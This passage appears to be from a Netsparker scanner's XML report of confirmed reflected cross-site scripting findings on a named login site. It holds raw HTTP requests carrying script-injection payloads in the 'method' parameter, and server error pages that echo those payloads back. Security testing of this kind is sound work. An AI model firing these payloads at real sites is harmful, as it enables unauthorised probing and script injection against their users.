    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000AE9)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:07 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000B37)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B37)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B37)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 16
Accept-Encoding: gzip, deflate

login=3&amp;submit=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B37)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:09 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000B63)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B63)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B63)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 7
Accept-Encoding: gzip, deflate

login=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B63)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:10 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000B7D)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B7D)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B7D)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
